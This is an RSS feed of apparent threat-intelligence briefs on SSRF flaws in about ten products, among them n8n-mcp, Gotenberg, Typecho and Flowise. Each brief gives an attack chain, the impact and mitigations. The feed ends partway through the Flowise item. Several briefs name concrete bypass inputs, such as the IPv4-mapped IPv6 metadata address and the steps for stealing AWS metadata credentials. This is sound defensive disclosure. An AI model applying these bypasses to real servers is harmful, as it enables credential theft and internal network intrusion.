<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>SSRF — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/tags/ssrf/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata — refreshed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Sat, 02 May 2026 06:16:04 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/tags/ssrf/feed.xml" rel="self" type="application/rss+xml"/><item><title>PixelYourSite Pro WordPress Plugin SSRF Vulnerability (CVE-2026-7049)</title><link>https://feed.craftedsignal.io/briefs/2026-05-pys-ssrf/</link><pubDate>Sat, 02 May 2026 06:16:04 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-pys-ssrf/</guid><description>The PixelYourSite Pro WordPress plugin is vulnerable to server-side request forgery (SSRF), allowing unauthenticated attackers to make arbitrary web requests from the server, potentially querying or modifying internal services.</description><content:encoded><![CDATA[<p>CVE-2026-7049 is a server-side request forgery (SSRF) vulnerability found in the PixelYourSite Pro WordPress plugin. Specifically, all versions up to and including 12.5.0.1 are affected. This vulnerability allows unauthenticated attackers to send requests to arbitrary internal or external resources, as viewed from the web server. Although the fetched response bodies are not directly returned to the attacker (making it a blind SSRF), the application parses these responses internally, creating opportunities for reconnaissance and potentially for exploiting vulnerable internal services. Successful exploitation could expose sensitive information or allow unauthorized modification of internal systems.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unauthenticated attacker identifies the <code>scan_video</code> parameter as an SSRF entry point.</li>
<li>The attacker crafts a malicious HTTP request targeting the WordPress server with the vulnerable PixelYourSite Pro plugin. The request includes the <code>scan_video</code> parameter set to a URL pointing to an internal resource (e.g., internal IP address or hostname).</li>
<li>The WordPress server receives the malicious request.</li>
<li>The PixelYourSite Pro plugin processes the request and initiates an HTTP request to the URL specified in the <code>scan_video</code> parameter.</li>
<li>The WordPress server makes a request to the internal resource.</li>
<li>The response from the internal resource is received by the WordPress server.</li>
<li>The PixelYourSite Pro plugin parses the response body, potentially revealing information about the internal service.</li>
<li>Depending on the targeted internal service and the attacker&rsquo;s crafted request, the attacker might be able to modify information or execute commands on the internal service, even though the response is not directly returned to the attacker.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7049 allows an unauthenticated attacker to perform reconnaissance of internal network resources. The blind nature of the SSRF limits the attacker&rsquo;s immediate visibility into the response, but internal parsing of the response allows for potential information disclosure and exploitation of vulnerable internal services. The scope of the impact depends heavily on the configuration of the internal network and the services exposed.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the PixelYourSite Pro plugin to a version greater than 12.5.0.1 to patch CVE-2026-7049.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious PixelYourSite Pro SSRF Attempts</code> to monitor for exploitation attempts targeting the <code>scan_video</code> parameter.</li>
<li>Review and restrict internal network access to sensitive services to mitigate the potential impact of SSRF vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">threat</category><category>ssrf</category><category>wordpress</category><category>plugin</category></item><item><title>n8n-mcp SDK Embedder SSRF Vulnerability via IPv6 Bypass</title><link>https://feed.craftedsignal.io/briefs/2026-04-n8n-mcp-ssrf/</link><pubDate>Thu, 30 Apr 2026 18:12:54 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-n8n-mcp-ssrf/</guid><description>The n8n-mcp SDK embedder path is vulnerable to server-side request forgery (SSRF) due to the synchronous URL validator in `SSRFProtection.validateUrlSync()` not checking for IPv6 addresses, allowing attackers to access cloud metadata endpoints, RFC1918 private networks, or localhost services by supplying a crafted `n8nApiUrl`.</description><content:encoded><![CDATA[<p>The n8n-mcp library, when embedded as an SDK, contains a server-side request forgery (SSRF) vulnerability. The vulnerability lies in the <code>SSRFProtection.validateUrlSync()</code> function, specifically within the <code>N8NDocumentationMCPServer</code> constructor, <code>getN8nApiClient()</code>, and <code>validateInstanceContext()</code> methods. This synchronous validator lacks IPv6 checks, allowing IPv4-mapped IPv6 addresses (e.g., <code>http://[::ffff:169.254.169.254]</code>) to bypass existing protections against cloud metadata, localhost, and private IP ranges. An attacker who can control the <code>n8nApiUrl</code> parameter can exploit this flaw to force the server to make HTTP requests to internal or external services. This issue affects deployments embedding n8n-mcp as an SDK using <code>N8NDocumentationMCPServer</code> or <code>N8NMCPEngine</code> with user-supplied <code>InstanceContext</code> on versions v2.47.4 through v2.47.13. Version v2.47.14 and later contain the patch for this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a vulnerable n8n-mcp deployment embedding the SDK and using a user-supplied <code>InstanceContext</code>.</li>
<li>The attacker crafts a malicious <code>n8nApiUrl</code> containing an IPv4-mapped IPv6 address, such as <code>http://[::ffff:169.254.169.254]</code>.</li>
<li>The attacker supplies the crafted <code>n8nApiUrl</code> to the vulnerable <code>N8NDocumentationMCPServer</code> constructor or <code>getN8nApiClient()</code> method.</li>
<li>The <code>validateInstanceContext()</code> function calls <code>SSRFProtection.validateUrlSync()</code> to validate the URL.</li>
<li>The <code>validateUrlSync()</code> function fails to properly validate the IPv4-mapped IPv6 address.</li>
<li>The server issues an HTTP request to the attacker-specified target using the bypassed URL.</li>
<li>The <code>x-n8n-api-key</code> header is forwarded to the attacker-controlled target.</li>
<li>The response body from the target is returned to the attacker, allowing the attacker to gather sensitive information from internal services or cloud metadata endpoints.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows an attacker to perform unauthorized actions, such as accessing sensitive information from cloud metadata endpoints (AWS IMDS, GCP, Azure, Alibaba, Oracle), RFC1918 private networks, or localhost services. The attacker can also gain access to the <code>n8nApiKey</code>, which is forwarded in the <code>x-n8n-api-key</code> header, potentially leading to further compromise of the n8n instance. This vulnerability impacts deployments embedding n8n-mcp as an SDK between versions v2.47.4 and v2.47.13.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade n8n-mcp to version v2.47.14 or later to patch the vulnerability as described in the advisory.</li>
<li>Implement a network-level block on outbound traffic from the n8n-mcp process to RFC1918 ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), link-local <code>169.254.0.0/16</code>, and cloud metadata endpoints as a defense-in-depth measure.</li>
<li>Deploy the Sigma rule <code>Detect N8N MCP SSRF Attempt via IPv6 Bypass</code> to identify exploitation attempts by detecting outbound connections to internal IPs using IPv6 mapped IPv4 address.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cwe-918</category><category>n8n-mcp</category></item><item><title>Gotenberg Unauthenticated SSRF Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-gotenberg-ssrf/</link><pubDate>Thu, 30 Apr 2026 17:24:55 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-gotenberg-ssrf/</guid><description>Gotenberg version 8.29.1 is vulnerable to Server-Side Request Forgery (SSRF) due to an unfiltered webhook URL, allowing unauthenticated attackers to force outbound HTTP POST requests to arbitrary destinations, enabling internal network probing and interaction with internal services.</description><content:encoded><![CDATA[<p>Gotenberg version 8.29.1, as distributed in the default <code>gotenberg/gotenberg:8</code> Docker image, contains an unauthenticated Server-Side Request Forgery (SSRF) vulnerability. Discovered on April 4, 2026, this flaw allows an attacker with network access to the Gotenberg instance to specify an arbitrary URL via the <code>Gotenberg-Webhook-Url</code> request header, forcing the server to make outbound HTTP POST requests. This is a blind SSRF vulnerability, where the attacker cannot directly read the response body, but can infer information based on the success or failure of the request. The vulnerability exists due to an insecure default in the <code>FilterDeadline</code> function, which, when unconfigured, permits all webhook URLs. The impact includes internal network probing, forced POST requests to internal services, and cloud metadata interaction.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Gotenberg instance exposed on the network (default port 3000).</li>
<li>The attacker crafts an HTTP POST request to the <code>/forms/chromium/convert/url</code> endpoint.</li>
<li>The attacker includes the <code>Gotenberg-Webhook-Url</code> header, setting it to an internal IP address and port (e.g., <code>http://192.168.1.10:8080/</code>).</li>
<li>The attacker may also set the <code>Gotenberg-Webhook-Error-Url</code> to an attacker-controlled server to monitor for request failures.</li>
<li>Gotenberg&rsquo;s <code>FilterDeadline</code> function fails to properly validate the supplied webhook URL due to an insecure default.</li>
<li>Gotenberg makes an outbound HTTP POST request to the specified internal IP address and port using the retryablehttp client, potentially retrying the request up to 4 times.</li>
<li>If the internal target responds with a 2xx status code, the attacker infers that the host and port are open and accepting POST requests. The error URL is NOT called.</li>
<li>If the internal target responds with a 4xx/5xx status code, times out, or rejects the connection, the attacker receives a request at the <code>Gotenberg-Webhook-Error-Url</code> endpoint, indicating the port is likely closed or the service is unavailable.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The SSRF vulnerability in Gotenberg 8.29.1 allows attackers to probe internal networks, potentially mapping out internal infrastructure by observing the success or failure of requests. Attackers can also force Gotenberg to send POST requests to internal services that perform actions upon receiving such requests, potentially triggering unintended behavior. Although the attacker cannot directly read response bodies, the ability to determine reachability and trigger actions makes this a significant security risk. The retry mechanism amplifies the probing effect, as each request generates up to 4 attempts.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the recommended configuration to either set <code>--env GOTENBERG_API_WEBHOOK_ALLOW_LIST</code> or <code>--env GOTENBERG_API_WEBHOOK_DENY_LIST</code> to restrict or block internal ranges to mitigate the SSRF vulnerability.</li>
<li>Monitor web server logs for POST requests to <code>/forms/chromium/convert/url</code> with the <code>Gotenberg-Webhook-Url</code> header containing suspicious internal IP addresses or domains using the provided Sigma rule.</li>
<li>Deploy the Sigma rule to detect suspicious outbound network connections originating from the Gotenberg process to internal IP ranges or cloud metadata endpoints.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>gotenberg</category><category>cve-2026-39383</category></item><item><title>OpenClaw QQ Bot Media Download SSRF Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-openclaw-ssrf/</link><pubDate>Wed, 29 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-openclaw-ssrf/</guid><description>OpenClaw before 2026.4.8 is vulnerable to server-side request forgery (SSRF) in QQ Bot media download paths, allowing attackers to bypass SSRF protections and access internal resources.</description><content:encoded><![CDATA[<p>OpenClaw, a QQ Bot platform, is susceptible to a server-side request forgery (SSRF) vulnerability. This flaw exists in versions prior to 2026.4.8 within the media download paths of the QQ Bot functionality. Specifically, the vulnerability allows attackers to bypass existing SSRF protections. By exploiting unprotected media fetch endpoints, malicious actors can potentially gain unauthorized access to internal resources and circumvent established allowlist policies. This vulnerability poses a significant risk to the confidentiality and integrity of systems and data accessible from the OpenClaw server. Successful exploitation can lead to information disclosure, denial of service, or even remote code execution on internal systems, depending on the accessible resources.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an OpenClaw instance running a version prior to 2026.4.8.</li>
<li>The attacker crafts a malicious URL targeting the QQ Bot media download functionality. This URL contains a payload designed to exploit the SSRF vulnerability.</li>
<li>The attacker injects the malicious URL into the QQ Bot&rsquo;s media download path, bypassing expected SSRF protections.</li>
<li>OpenClaw processes the crafted URL without proper validation, initiating a request to an attacker-controlled internal resource.</li>
<li>The OpenClaw server makes a request to the specified internal resource, potentially exposing sensitive information or triggering unintended actions.</li>
<li>The internal resource responds to the OpenClaw server, and the response is potentially relayed back to the attacker or used to further compromise the system.</li>
<li>The attacker gains unauthorized access to internal resources or sensitive data due to the successful SSRF attack.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-41914) can lead to the disclosure of sensitive information from internal systems, potentially affecting all users and services dependent on the compromised OpenClaw instance. The severity is amplified by the potential to bypass existing SSRF protections, increasing the attack surface and difficulty of detection. Impact ranges from information disclosure to potential compromise of other internal services, depending on the specific internal resources accessible from the OpenClaw server.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade OpenClaw to version 2026.4.8 or later to patch the SSRF vulnerability (CVE-2026-41914).</li>
<li>Deploy the Sigma rule <code>Detect Suspicious OpenClaw SSRF Attempt</code> to identify potential exploitation attempts targeting the vulnerable media download paths.</li>
<li>Implement strict network segmentation to limit the impact of a successful SSRF attack by restricting access to sensitive internal resources from the OpenClaw server.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-41914</category><category>openclaw</category></item><item><title>ChatGPTNextWeb NextChat Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-nextchat-ssrf/</link><pubDate>Tue, 28 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-nextchat-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability in ChatGPTNextWeb NextChat up to version 2.16.1 allows remote attackers to manipulate the proxyHandler function, potentially leading to unauthorized internal resource access.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability, identified as CVE-2026-7177, affects ChatGPTNextWeb NextChat up to version 2.16.1. The vulnerability resides within the <code>proxyHandler</code> function in the <code>app/api/[provider]/[...path]/route.ts</code> file. Publicly available exploits demonstrate that a remote attacker can manipulate this function to make unauthorized requests to internal resources. The project maintainers were notified, but have not yet responded to the issue, increasing the risk of widespread exploitation. This vulnerability allows attackers to potentially access sensitive information or internal services that are not intended to be exposed to the internet.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a NextChat instance running a vulnerable version (&lt;= 2.16.1).</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>app/api/[provider]/[...path]/route.ts</code> endpoint.</li>
<li>The crafted request manipulates the <code>proxyHandler</code> function parameters.</li>
<li>The <code>proxyHandler</code> function, without proper validation, forwards the manipulated request to an internal server or resource.</li>
<li>The internal server processes the request as if it originated from the NextChat server itself.</li>
<li>The internal server returns the response to the NextChat server.</li>
<li>The NextChat server forwards the response from the internal server back to the attacker.</li>
<li>The attacker gains access to potentially sensitive information or can interact with internal services due to the SSRF vulnerability.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability allows attackers to potentially access internal resources, including sensitive data or internal services not intended for public access. While the CVSS score is 7.3 (HIGH), the impact is limited to information disclosure and limited modification/availability of resources. The number of affected instances is currently unknown. If successfully exploited, attackers could potentially use the compromised NextChat instance as a proxy to further compromise the internal network.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply input validation and sanitization to the <code>proxyHandler</code> function within <code>app/api/[provider]/[...path]/route.ts</code> to prevent malicious manipulation (Reference: CVE-2026-7177).</li>
<li>Monitor web server logs for unusual requests targeting the <code>app/api</code> endpoint with potentially malicious parameters (See example Sigma rule below).</li>
<li>Implement network segmentation to restrict access from the NextChat server to only necessary internal resources (General security best practice related to SSRF).</li>
<li>Deploy the Sigma rules provided to detect exploitation attempts against NextChat instances.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-7177</category><category>web-application</category></item><item><title>Typecho &lt;= 1.3.0 Server-Side Request Forgery Vulnerability (CVE-2026-7025)</title><link>https://feed.craftedsignal.io/briefs/2026-04-typecho-ssrf/</link><pubDate>Sun, 26 Apr 2026 08:17:46 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-typecho-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in Typecho up to version 1.3.0, allowing remote attackers to manipulate the X-Pingback/link argument in the Service::sendPingHandle function to potentially make arbitrary HTTP requests.</description><content:encoded><![CDATA[<p>Typecho is vulnerable to a server-side request forgery (SSRF) vulnerability (CVE-2026-7025) affecting versions up to 1.3.0. The vulnerability resides in the <code>Service::sendPingHandle</code> function within the <code>var/Widget/Service.php</code> file, specifically impacting the Ping Back Service Endpoint component. An attacker can remotely trigger this vulnerability by manipulating the <code>X-Pingback/link</code> argument. Publicly available exploits exist, increasing the risk of exploitation. The vendor was notified but did not respond. This vulnerability allows an attacker to potentially make arbitrary HTTP requests from the server, leading to information disclosure or further compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a Typecho instance running a vulnerable version (&lt;= 1.3.0).</li>
<li>The attacker crafts a malicious HTTP request targeting the Pingback service endpoint.</li>
<li>The malicious request includes a manipulated <code>X-Pingback</code> or <code>link</code> argument pointing to an attacker-controlled server or internal resource.</li>
<li>The <code>Service::sendPingHandle</code> function processes the request and attempts to fetch the resource specified in the <code>X-Pingback/link</code> argument.</li>
<li>Due to the SSRF vulnerability, the Typecho server makes an outbound HTTP request to the attacker-specified URL.</li>
<li>The attacker&rsquo;s server logs the incoming request from the Typecho server, confirming the SSRF vulnerability.</li>
<li>The attacker could potentially use this SSRF vulnerability to scan internal networks, read sensitive files, or interact with internal services.</li>
<li>Successful exploitation could lead to information disclosure, further exploitation of internal services, or denial-of-service attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7025 can allow an attacker to perform unauthorized actions on the internal network of the Typecho server. This includes port scanning, accessing internal services, and potentially reading sensitive data. The number of affected installations is unknown, but any Typecho instance running version 1.3.0 or earlier is vulnerable. The impact is limited to the permissions of the Typecho web server process, but can expose sensitive internal services that are not directly accessible from the internet.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply input validation and sanitization to the <code>X-Pingback/link</code> argument to prevent arbitrary URL inclusion, mitigating CVE-2026-7025.</li>
<li>Monitor web server logs for suspicious requests containing unusual URLs in the <code>X-Pingback</code> header, which can indicate SSRF attempts.</li>
<li>Implement network segmentation to limit the impact of potential SSRF attacks by restricting the web server&rsquo;s access to internal resources.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious X-Pingback Header</code> to identify potential SSRF attempts targeting the Pingback service.</li>
<li>Audit outbound network connections from the web server to detect unauthorized access to internal resources as a result of SSRF.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-7025</category><category>typecho</category></item><item><title>WWBN AVideo SSRF Vulnerability (CVE-2026-41055)</title><link>https://feed.craftedsignal.io/briefs/2026-04-wwbn-avideo-ssrf/</link><pubDate>Wed, 22 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-wwbn-avideo-ssrf/</guid><description>WWBN AVideo versions 29.0 and below are vulnerable to Server-Side Request Forgery (SSRF) due to an incomplete fix in the LiveLinks proxy, potentially allowing attackers to redirect traffic to internal endpoints.</description><content:encoded><![CDATA[<p>WWBN AVideo, an open-source video platform, is vulnerable to Server-Side Request Forgery (SSRF) in versions 29.0 and below. The vulnerability, identified as CVE-2026-41055, stems from an incomplete fix in the LiveLinks proxy. While the fix introduced <code>isSSRFSafeURL()</code> validation, it fails to address Time-of-Check Time-of-Use (TOCTOU) vulnerabilities related to DNS rebinding. This flaw allows attackers to bypass the intended SSRF protection by manipulating DNS responses between the validation check and the actual HTTP request, potentially redirecting traffic to internal, sensitive endpoints. The vulnerability can be remediated by applying the updated fix found in commit 8d8fc0cadb425835b4861036d589abcea4d78ee8. Exploitation could lead to information disclosure or unauthorized access to internal services.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies an AVideo instance running a vulnerable version (&lt;= 29.0).</li>
<li>Attacker crafts a malicious URL targeting the AVideo LiveLinks proxy feature.</li>
<li>The malicious URL is designed to leverage DNS rebinding techniques.</li>
<li>The AVideo server first validates the URL using <code>isSSRFSafeURL()</code>, which initially resolves to a safe, external IP address.</li>
<li>After validation, but before the HTTP request is made, the DNS record for the malicious URL is altered to point to an internal IP address.</li>
<li>The AVideo server, due to the TOCTOU vulnerability, now makes an HTTP request to the attacker-controlled internal IP address.</li>
<li>The attacker gains access to internal resources or services through the AVideo server.</li>
<li>Attacker exfiltrates sensitive data or pivots to other internal systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-41055) in WWBN AVideo could allow attackers to access sensitive internal resources that are not intended to be exposed to the public internet. An attacker could potentially read internal configuration files, access databases, or even execute commands on internal systems, depending on the exposed services. The specific impact will vary depending on the organization&rsquo;s internal network configuration and the services running behind the AVideo server.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade WWBN AVideo to a version containing the complete SSRF fix, referencing commit 8d8fc0cadb425835b4861036d589abcea4d78ee8.</li>
<li>Implement network segmentation to limit the impact of potential SSRF vulnerabilities by restricting access from the AVideo server to only necessary internal resources.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious AVideo SSRF Attempt</code> to detect potential exploitation attempts via web server logs.</li>
<li>Monitor web server logs for unusual outbound connections from the AVideo server to internal IP addresses based on the <code>network_connection</code> log source.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>avideo</category><category>cve-2026-41055</category></item><item><title>Moxi Blog v2 &lt;= 5.2 Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-mogu-blog-ssrf/</link><pubDate>Mon, 20 Apr 2026 10:16:44 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-mogu-blog-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in moxi624 Mogu Blog v2 up to version 5.2, specifically affecting the `LocalFileServiceImpl.uploadPictureByUrl` function, allowing remote attackers to potentially interact with internal resources.</description><content:encoded><![CDATA[<p>Moxi Blog v2, a blogging platform, is vulnerable to a server-side request forgery (SSRF) vulnerability (CVE-2026-6625) in versions up to 5.2. The vulnerability resides within the <code>LocalFileServiceImpl.uploadPictureByUrl</code> function of the Picture Storage Service component. This flaw allows a remote attacker to potentially force the server to make HTTP requests to arbitrary domains, including internal services, potentially exposing sensitive information or allowing unauthorized actions. The vulnerability has been publicly disclosed, making it crucial to address this issue to prevent potential exploitation. The vendor has been notified but has not responded.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a Mogu Blog v2 instance running a vulnerable version (&lt;= 5.2).</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>uploadPictureByUrl</code> function.</li>
<li>Within the crafted request, the attacker provides a URL pointing to an internal resource or an external server controlled by the attacker.</li>
<li>The Mogu Blog server processes the request and attempts to retrieve the resource specified in the URL via an HTTP GET request.</li>
<li>If the targeted URL points to an internal service, the server may inadvertently expose sensitive information (e.g., internal API keys, service configurations).</li>
<li>If the targeted URL points to an external server controlled by the attacker, the server may leak information about itself (e.g., internal IP address, software versions).</li>
<li>The attacker analyzes the response from the server to gather sensitive information or identify further attack vectors.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability could allow an attacker to scan internal networks, access internal services not exposed to the public internet, potentially read sensitive data, or leverage the server as a proxy to attack other systems. This can lead to information disclosure, unauthorized access to internal resources, and further compromise of the Mogu Blog infrastructure. The number of affected installations is unknown, but all instances of Mogu Blog v2 up to 5.2 are potentially vulnerable.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect web server logs for requests containing URLs to internal IP addresses (e.g. 127.0.0.1, 192.168.x.x, 10.x.x.x) in the <code>cs-uri-query</code> field using a webserver log rule.</li>
<li>Monitor network connections originating from the Mogu Blog server to unusual or internal destinations, using a <code>network_connection</code> Sigma rule.</li>
<li>Implement input validation and sanitization for the <code>uploadPictureByUrl</code> function to prevent the server from making requests to untrusted URLs.</li>
<li>Apply any available patches or updates from the vendor to address CVE-2026-6625 (though no vendor response was noted).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>SSRF</category><category>Mogu Blog</category><category>CVE-2026-6625</category></item><item><title>Movary SSRF Vulnerability (CVE-2026-40348)</title><link>https://feed.craftedsignal.io/briefs/2026-04-movary-ssrf/</link><pubDate>Sat, 18 Apr 2026 00:16:38 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-movary-ssrf/</guid><description>Movary versions before 0.71.1 are vulnerable to server-side request forgery (SSRF) via the `/settings/jellyfin/server-url-verify` endpoint, allowing authenticated users to probe internal network resources.</description><content:encoded><![CDATA[<p>Movary, a self-hosted web application for tracking and rating movies, is susceptible to a Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-40348) in versions prior to 0.71.1. This flaw allows authenticated users to manipulate the <code>/settings/jellyfin/server-url-verify</code> endpoint to initiate server-side HTTP requests to arbitrary internal targets. The application uses the Guzzle HTTP client to send requests based on a user-supplied URL, to which <code>/system/info/public</code> is appended. The absence of input validation on the target URL allows attackers to bypass intended restrictions and access internal network resources. This vulnerability enables threat actors to perform internal reconnaissance activities such as host discovery, port scanning, and service fingerprinting. Successful exploitation can lead to further compromise by exposing internal administrative interfaces or cloud metadata endpoints.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker authenticates to the Movary web application with a valid user account.</li>
<li>The attacker crafts a malicious URL targeting an internal resource, such as <code>http://127.0.0.1/</code>.</li>
<li>The attacker sends a <code>POST</code> request to <code>/settings/jellyfin/server-url-verify</code> with the crafted URL as the <code>serverUrl</code> parameter.</li>
<li>The Movary server receives the request and appends <code>/system/info/public</code> to the user-provided URL.</li>
<li>The Movary server uses the Guzzle HTTP client to initiate an HTTP request to the modified URL (e.g., <code>http://127.0.0.1/system/info/public</code>).</li>
<li>The internal service at the targeted IP address responds to the Movary server.</li>
<li>Based on the HTTP response code and content, the attacker can infer the existence and status of internal services. This allows for port scanning and service fingerprinting.</li>
<li>The attacker leverages discovered services to escalate privileges, potentially accessing sensitive data or internal administrative panels.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of the SSRF vulnerability (CVE-2026-40348) in Movary can enable attackers to discover internal network infrastructure and identify vulnerable services. This can allow attackers to gain unauthorized access to sensitive information, pivot to other internal systems, or perform other malicious activities. Although no specific victim count is given, the impact of this vulnerability is potentially high for any organization using a vulnerable version of Movary.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Movary to version 0.71.1 or later to patch the SSRF vulnerability (CVE-2026-40348).</li>
<li>Deploy the Sigma rule <code>Detect Movary SSRF Attempt</code> to identify potential exploitation attempts in web server logs.</li>
<li>Implement network segmentation and access controls to restrict access to sensitive internal services, limiting the impact of potential SSRF attacks.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-40348</category><category>movary</category><category>web-application</category></item><item><title>Flowise SSRF Protection Bypass via Unprotected Built-in HTTP Modules</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-flowise-ssrf/</link><pubDate>Thu, 16 Apr 2026 21:50:12 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-flowise-ssrf/</guid><description>Flowise is vulnerable to SSRF protection bypass via unprotected built-in HTTP modules in the custom function sandbox, allowing authenticated users to access internal network resources by exploiting the lack of SSRF protection on Node.js `http`, `https`, and `net` modules.</description><content:encoded><![CDATA[<p>Flowise, a low-code platform for building custom automation workflows, is susceptible to a Server-Side Request Forgery (SSRF) protection bypass. This vulnerability stems from the application&rsquo;s incomplete implementation of SSRF defenses. While <code>axios</code> and <code>node-fetch</code> libraries are secured with an <code>HTTP_DENY_LIST</code>, the built-in Node.js modules <code>http</code>, <code>https</code>, and <code>net</code> are permitted within the NodeVM sandbox without any equivalent restrictions. An authenticated attacker can exploit this oversight in Flowise version 3.0.13 and earlier to make arbitrary HTTP requests to internal network resources. This issue allows bypassing intended security controls and potentially accessing sensitive information, such as cloud provider metadata services.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker authenticates to a Flowise instance using a valid API key or session.</li>
<li>The attacker crafts a malicious JavaScript payload designed to exploit the custom function feature.</li>
<li>The malicious payload imports the built-in <code>http</code> module.</li>
<li>The payload constructs an HTTP request targeting an internal resource, such as the AWS metadata service at <code>169.254.169.254</code>.</li>
<li>The request includes a header to obtain an IAM token: <code>'X-aws-ec2-metadata-token-ttl-seconds': '21600'</code>.</li>
<li>The payload uses the obtained IAM token to request temporary AWS credentials from the metadata service.</li>
<li>The custom function executes the code within the NodeVM sandbox, bypassing the intended SSRF protection.</li>
<li>The attacker retrieves the temporary AWS credentials from the metadata service, potentially leading to unauthorized access to AWS resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can have significant consequences. Attackers can steal temporary IAM credentials from cloud provider metadata services, granting them unauthorized access to other cloud resources. Furthermore, they can scan internal networks to discover services and identify additional attack targets. The ability to reach databases, admin panels, and other internal APIs that should not be externally accessible poses a severe security risk, potentially leading to data breaches or system compromise. All Flowise deployments where <code>HTTP_DENY_LIST</code> is configured for SSRF protection are vulnerable, while deployments without it are already generally vulnerable to SSRF.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
